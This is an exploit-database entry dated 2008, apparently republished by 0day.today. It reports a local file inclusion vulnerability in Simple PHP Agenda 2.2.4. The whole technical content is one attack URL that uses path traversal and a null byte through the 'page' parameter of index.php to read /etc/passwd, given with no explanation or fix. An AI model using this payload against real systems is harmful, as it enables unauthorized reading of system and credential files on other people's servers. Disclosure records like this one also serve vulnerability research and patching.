id: 3334
date: 06/30/2008
title: php-Agenda 2.2.4 (index.php page) Local File Inclusion Vulnerability
author: StAkeR
cves: 

====================================================================
php-Agenda 2.2.4 (index.php page) Local File Inclusion Vulnerability
====================================================================



@~~==========================================================================~~@
|  Simple PHP Agenda <= 2.2.4 Local File Inclusion Vulnerability               |
@~~==========================================================================~~@
|  index.php?page=../../../../../../../etc/passwd%00
@~~==========================================================================~~@




#  0day.today [2023-03-25]  #